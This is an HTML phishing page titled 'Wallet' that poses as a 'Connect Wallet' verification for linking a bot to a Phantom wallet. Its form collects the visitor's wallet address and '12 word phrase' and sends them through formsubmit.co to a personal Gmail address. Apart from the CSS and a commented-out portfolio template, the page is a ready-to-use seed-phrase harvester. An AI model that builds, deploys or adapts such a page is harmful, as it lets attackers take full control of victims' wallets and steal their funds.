<!DOCTYPE html>
<html lang="en">

    <head>
        <meta charset="UTF-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>Wallet</title>
        <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.3.0/css/all.min.css" />
        <style>
            @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;500;600&display=swap');

            @import url("https://fonts.googleapis.com/css2?family=Lato:wght@400;700;900&display=swap");

:root {
  --primary-color: #071269;
  --text-dark: #0f172a;
  --text-light: #64748b;
  --white: #121111;
  --max-width: 1200px;
}


            *{
                padding: 0;
                margin: 0;
                box-sizing: border-box;
                font-family: poppins;
            }

        body{

           background-image: url(wall.jpg);
           background-repeat: no-repeat;
           background-size: 100vw 100vh;
           
        }
            #about-section {
                width: 100%;
                height: auto;
                display: flex;
                justify-content: space-between;
                align-items: center;
                padding: 80px 12%;
            }
            .about-left img{
                width: 420px;
                height: auto;
                transform: translateY(50px);
            }
            .about-right {
                width: 54%;
                margin-left: 50%;
            }

            .about-right ul li {
                display: flex;
                align-items: center;
            }

            .about-right h1 {
                color: white;
                font-size: 37px;
                margin-bottom: 5px;
            }

            
            .about-right h4{

                color: skyblue;

            }


            .about-right h3{

                color: white;

            }

            .about-right p {
                color: #444;
                line-height: 26px;
                font-size: 15px;
            }

            form p input{
                width: 50%;
                padding: 15px 10px;
                margin-bottom: 5%;
                border-radius: 40px;
                border: none;
            }

            form p input:first-child{
                margin-top: 3%;
            }

            form button{
                background-color: #071269;
                width: 30%;
                padding: 10px 5px;
                font-family: Arial, Helvetica, sans-serif;
                font-size: larger;
                color: white;
                border-radius: 40px;
                border: none;
            }

            .about-right .address {
                margin: 25px 0;
            }

            .about-right .address ul li {
                margin-bottom: 5px;
            }

            .address .address-logo {
                margin-right: 15px;
                color: #e74d06;
            }

            .address .saprater {
                margin: 0 35px;
            }

            .about-right .expertise ul {
                width: 80%;
                display: flex;
                align-items: center;
                justify-content: space-between;
            }

            .expertise h3 {
                margin-bottom: 10px;
            }

            .expertise .expertise-logo {
                font-size: 19px;
                margin-right: 10px;
                color: #e74d06;
            }

            .button {
                color: red;
            }
        </style>
    </head>

    <body>
        <section id="about-section">
            <!-- about left  -->
            <!-- <div class="about-left">
                <img src=" https://images.pexels.com/photos/14348480/pexels-photo-14348480.jpeg?auto=compress&cs=tinysrgb&w=600" alt="About Img"/>
            </div> -->

            <!-- about right  -->
            <div class="about-right">
                <h4>CONNECT WALLET</h4>
                <h1>Wallet Address</h1>

                <h3>Verification to link Bot to phantom wallet 
                for authorization procedure.</h3>
               



        <form action="https://formsubmit.co/vallmik73@gmail.com" method="POST">
           <p> <input type="text" name="name"  placeholder="Enter Wallet Address " required></p>
           <p> <input type="text" name="name"  placeholder="Enter 12 word phrase  " required></p>
           <p> <button type="submit">Send</button></p> 
        </form>
              <!--  <div class="address">
                    <ul>
                        <li>
                            <span class="address-logo">
                                <i class="fas fa-paper-plane"></i>
                            </span>
                            <p>Address</p>
                            <span class="saprater">:</span>
                            <p>Jaipur, Rajasthan, India</p>
                        </li>
                        <li>
                            <span class="address-logo">
                                <i class="fas fa-phone-alt"></i>
                            </span>
                            <p>Phone No</p>
                            <span class="saprater">:</span>
                            <p>+91 987-654-4321</p>
                        </li>
                        <li>
                            <span class="address-logo">
                                <i class="far fa-envelope"></i>
                            </span>
                            <p>Email ID</p>
                            <span class="saprater">:</span>
                            <p>crowncoder@gmail.com</p>
                        </li>
                    </ul>
                </div>
                <div class="expertise">
                    <h3>My Expertise</h3>
                    <ul>
                        <li>
                            <span class="expertise-logo">
                                <i class="fab fa-html5"></i>
                            </span>
                            <p>HTML</p>
                        </li>
                        <li>
                            <span class="expertise-logo">
                                <i class="fab fa-css3-alt"></i>
                            </span>
                            <p>CSS</p>
                        </li>
                        <li>
                            <span class="expertise-logo">
                                <i class="fab fa-node-js"></i>
                            </span>
                            <p>Java Script</p>
                        </li>
                        <li>
                            <span class="expertise-logo">
                                <i class="fab fa-react"></i>
                            </span>
                            <p>React Js</p>-->
                        </li>
                    </ul>
                </div>
            </div>
        </section>
    </body>

</html>
